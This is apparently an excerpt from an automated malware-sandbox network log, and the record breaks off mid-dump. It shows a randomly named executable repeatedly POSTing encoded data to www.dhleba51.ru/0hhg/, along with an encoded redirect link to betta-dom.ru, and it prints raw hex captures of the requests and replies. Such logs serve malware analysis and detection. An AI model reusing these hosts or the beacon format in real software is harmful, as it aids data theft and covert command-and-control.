                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 3c 70 3e 54 68 69 73 20 69 74 65 6d 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 65 74 74 61 2d 64 6f 6d 2e 72 75 2f 30 68 68 67 2f 3f 41 42 71 44 57 36 41 38 3d 32 30 75 32 4e 4c 53 59 48 67 6c 47 47 7a 4c 58 70 43 76 54 78 58 50 76 35 6e 66 45 44 4b 6b 31 59 53 2b 41 30 32 36 66 56 45 62 53 56 6f 45 54 6c 57 61 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&amp;nNWXI=ybhXiHipjHJ">here</a>.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449742195.24.68.580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:19.965226889 CEST696OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dhleba51.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.dhleba51.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 57 41 72 65 51 32 2b 55 78 35 55 34 4d 6c 6c 67 4f 42 47 6a 39 53 4f 68 64 67 58 50 33 61 6c 32 6f 43 67 39 78 32 4f 7a 2f 75 71 2f 31 48 6d 4e 65 4a 30 4b 79 6f 41 67 30 55 76 6c 53 71 64 52 53 67 49 79 61 46 78 6e 63 68 4e 55 5a 32 76 77 68 31 55 6e 34 44 6a 76 70 65 4b 35 6a 77 34 32 4f 4b 2b 63 6f 74 47 63 72 65 78 68 72 44 47 44 78 41 57 66 47 73 4f 31 48 54 4e 51 72 66 39 5a 45 62 75 45 77 50 41 4e 39 4c 6c 64 62 72 4d 33 4d 58 53 56 63 51 7a 6a 46 31 53 56 5a 6f 39 68 4b 4e 74 4a 4f 37 64 55 51 67 79 70 2f 77 4e 72 71 65 63 6d 75 4d 4b 33 63 39 44 33 2b 72 54 4f 76 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=WAreQ2+Ux5U4MllgOBGj9SOhdgXP3al2oCg9x2Oz/uq/1HmNeJ0KyoAg0UvlSqdRSgIyaFxnchNUZ2vwh1Un4DjvpeK5jw42OK+cotGcrexhrDGDxAWfGsO1HTNQrf9ZEbuEwPAN9LldbrM3MXSVcQzjF1SVZo9hKNtJO7dUQgyp/wNrqecmuMK3c9D3+rTOvA==
                                                                                                    May 2, 2024 08:25:20.175931931 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:20 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = [TRUNCATED]
                                                                                                    May 2, 2024 08:25:20.175975084 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                                                                                    Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                                                                                    May 2, 2024 08:25:20.175988913 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                                                                                    Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                                                                                    May 2, 2024 08:25:20.176028967 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                                                                                    May 2, 2024 08:25:20.176043987 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                                                                                    May 2, 2024 08:25:20.176079988 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                                                                                    Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                                                                                    May 2, 2024 08:25:20.176145077 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                                                                                    Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                                                                                    May 2, 2024 08:25:20.176199913 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                                                                                    Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                                                                                    May 2, 2024 08:25:20.176213026 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                                                                                    May 2, 2024 08:25:20.176227093 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                    Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                                                                                    May 2, 2024 08:25:20.384119987 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.449743195.24.68.580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:22.708353996 CEST716OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dhleba51.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.dhleba51.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 57 41 72 65 51 32 2b 55 78 35 55 34 4f 46 31 67 4d 67 47 6a 74 43 4f 67 44 77 58 50 75 4b 6c 36 6f 43 63 39 78 33 62 73 2f 34 36 2f 31 69 61 4e 66 49 30 4b 7a 6f 41 67 2f 30 76 38 57 71 64 4f 53 67 56 53 61 48 31 6e 63 67 74 55 5a 33 66 77 68 47 4d 6b 33 7a 6a 74 69 2b 4b 33 74 51 34 32 4f 4b 2b 63 6f 75 36 79 72 65 35 68 71 77 65 44 77 68 57 63 50 4d 4f 32 58 6a 4e 51 76 66 39 6a 45 62 75 32 77 4f 4e 46 39 4f 68 64 62 70 6b 33 4d 6c 36 57 56 51 79 6d 4b 56 54 4c 52 6f 42 70 47 6f 6b 43 45 72 78 55 57 67 4c 46 2b 32 63 78 37 76 39 78 38 4d 75 45 42 36 4b 44 7a 6f 75 48 30 48 4d 4f 58 54 4e 4f 77 4e 67 2b 54 6d 41 52 6a 76 36 50 32 70 6b 3d
                                                                                                    Data Ascii: ABqDW6A8=WAreQ2+Ux5U4OF1gMgGjtCOgDwXPuKl6oCc9x3bs/46/1iaNfI0KzoAg/0v8WqdOSgVSaH1ncgtUZ3fwhGMk3zjti+K3tQ42OK+cou6yre5hqweDwhWcPMO2XjNQvf9jEbu2wONF9Ohdbpk3Ml6WVQymKVTLRoBpGokCErxUWgLF+2cx7v9x8MuEB6KDzouH0HMOXTNOwNg+TmARjv6P2pk=
                                                                                                    May 2, 2024 08:25:22.916147947 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 May 2024 06:25:22 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 48773
                                                                                                    Connection: close
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = [TRUNCATED]
                                                                                                    May 2, 2024 08:25:22.916198015 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                                                                                    Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                                                                                    May 2, 2024 08:25:22.916275978 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                                                                                    Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                                                                                    May 2, 2024 08:25:22.916363001 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                                                                                    Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                                                                                    May 2, 2024 08:25:22.916412115 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                                                                                    May 2, 2024 08:25:22.916469097 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                                                                                    Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                                                                                    May 2, 2024 08:25:22.916529894 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                                                                                    Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                                                                                    May 2, 2024 08:25:22.916590929 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                                                                                    Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                                                                                    May 2, 2024 08:25:22.916640997 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                                                                                    Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                                                                                    May 2, 2024 08:25:22.916764021 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                                                                                    Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                                                                                    May 2, 2024 08:25:23.120781898 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                                                                                    Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.449744195.24.68.580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:25.448990107 CEST10798OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dhleba51.ru
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dhleba51.ru
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dhleba51.ru/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 57 41 72 65 51 32 2b 55 78 35 55 34 4f 46 31 67 4d 67 47 6a 74 43 4f 67 44 77 58 50 75 4b 6c 36 6f 43 63 39 78 33 62 73 2f 34 79 2f 31 77 43 4e 65 76 67 4b 77 6f 41 67 38 30 76 68 57 71 63 53 53 67 4e 65 61 48 34 53 63 6c 70 55 57 30 58 77 77 58 4d 6b 67 6a 6a 74 74 65 4b 36 6a 77 34 47 4f 4b 75 59 6f 74 43 79 72 65 35 68 71 78 75 44 6d 41 57 63 44 73 4f 31 48 54 4e 4d 72 66 38 4d 45 66 44 42 77 4f 59 6e 39 39 5a 64 62 4a 55 33 66 47 53 57 4e 41 79 6f 47 31 54 44 52 6f 4d 33 47 6f 51 6f 45 72 30 7a 57 6a 58 46 36 6e 59 70 6a 62 4a 58 6a 2f 57 41 42 34 4b 6a 72 50 4b 6c 7a 42 73 4a 58 42 39 62 6f 63 59 6d 51 32 46 2b 2f 4e 69 79 72 4f 55 71 64 4e 4a 41 42 44 62 4d 69 43 47 76 34 53 74 42 46 36 78 4d 45 48 55 56 79 4d 30 44 4d 4e 6a 72 63 66 6f 44 72 58 78 77 79 30 79 62 34 73 48 54 36 4e 38 6c 53 58 56 38 35 5a 73 58 48 5a 31 79 76 41 36 36 64 30 4d 62 4f 37 50 36 32 45 45 36 59 53 58 6e 7a 4a 2b 6a 36 6e 69 64 36 6d 2b 4c 58 4f 50 5a 68 41 56 68 75 69 33 69 39 6a 52 58 43 [TRUNCATED]
                                                                                                    Data Ascii: 